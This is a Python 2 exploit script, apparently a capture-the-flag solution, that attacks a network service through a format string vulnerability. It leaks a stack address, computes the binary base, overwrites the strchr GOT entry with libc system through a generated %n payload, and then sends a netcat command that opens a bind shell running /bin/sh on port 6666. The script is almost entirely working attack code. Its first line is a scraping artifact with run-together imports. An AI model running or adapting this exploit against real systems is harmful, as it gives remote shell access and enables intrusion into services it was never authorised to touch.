#!/usr/bin/pythonimport socketfrom time import sleepimport refrom struct

1. #!/usr/bin/python
2. import socket
3. from time import sleep
4. import re
5. from struct import pack
6. import sys
7.  
8. # =========================================================================
9. # formatstring vuln pattern generator
10. # =========================================================================
11. def address_to_bytes(bytestowrite, correctby):
12.     tb = '%08X' % (bytestowrite)
13.     ba = bytearray(tb.decode('hex')[::-1])
14.     result = list()
15.    
16.     for i in range(len(ba)):
17.         ba[i] -= correctby
18.  
19.     for i in range(len(ba)):
20.         if not i:
21.             result.append(0x100 + ba[i] - 16)
22.         else:
23.             result.append(0x100 + ba[i] - ba[i - 1])
24.  
25.     return result
26.  
27. def generate_formatstr_exploit(writetoaddress, bytestowrite, slot, correctby=0, padlen=0):
28.     tbp = address_to_bytes(bytestowrite, correctby)
29.     addrstr = ''
30.     writestr = ''
31.     for i in range(len(tbp)):
32.         addrstr  += pack('<L', writetoaddress + i)
33.         writestr += '%{0}x%{1}$n'.format(
34.             str(tbp[i]),
35.             str(slot + i)
36.             )
37.  
38.     return addrstr + writestr + ''.join(('.') for i in range(padlen))
39.  
40. # =========================================================================
41. #
42. # =========================================================================
43. def exploit(host, port):
44.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
45.     s.connect((host, port))
46.    
47.     # username
48.     s.recv(1024)   
49.     s.send('%223$x'+'\n') # using the format string vuln to leak a binary address of the stack
50.    
51.     # password
52.     s.recv(1024)
53.     s.send('\n')
54.    
55.     # email
56.     s.recv(1024)
57.     s.send('\n')
58.  
59.     # message
60.     resp = s.recv(1024).strip()
61.     l = re.findall(r"'(.*?)'", resp)
62.    
63.     # calculate the current baseaddress
64.     binbase = int(l[0], 16) - 0x00000584
65.  
66.     # calculate the got entry address of
67.     # strchr from the binary base and the offset
68.     got_plt_strchr = binbase + 0x00003bc8
69.  
70.     # calculate the address to libc system from the
71.     # strchr entry(not the cleanest way)
72.     __libc_system = (got_plt_strchr + 0xffe8ff58) & 0xffffffff
73.  
74.     print "baseaddress: %s got_plt_strchr: %s __libc_system: %s" % (hex(binbase), hex(got_plt_strchr), hex(__libc_system))
75.  
76.     # send yes to continue and stay in the same process
77.     # and so the alsr doesnt re-base
78.     s.recv(1024)
79.     s.send('yes\n')
80.  
81.     # overwrite the got strchr entry to point to
82.     # libc system
83.     fs_payload = generate_formatstr_exploit(got_plt_strchr, __libc_system, 522, correctby=len("So your username is '"))
84.  
85.     # username
86.     s.recv(1024)
87.     s.send(fs_payload+'\n')
88.  
89.     # password
90.     s.recv(1024)
91.     s.send('\n')
92.  
93.     #email
94.     s.recv(1024)
95.     s.send('\n')
96.  
97.     # picked up by the last fgets call within get_string
98.     # and used as first argument in the strchr(now system) call
99.     s.recv(1024)
100.     s.send('/bin/nc.traditional -lvp 6666 -e /bin/sh\x00\n')
101.  
102.     s.close()
103.  
104. exploit(sys.argv[1], int(sys.argv[2]))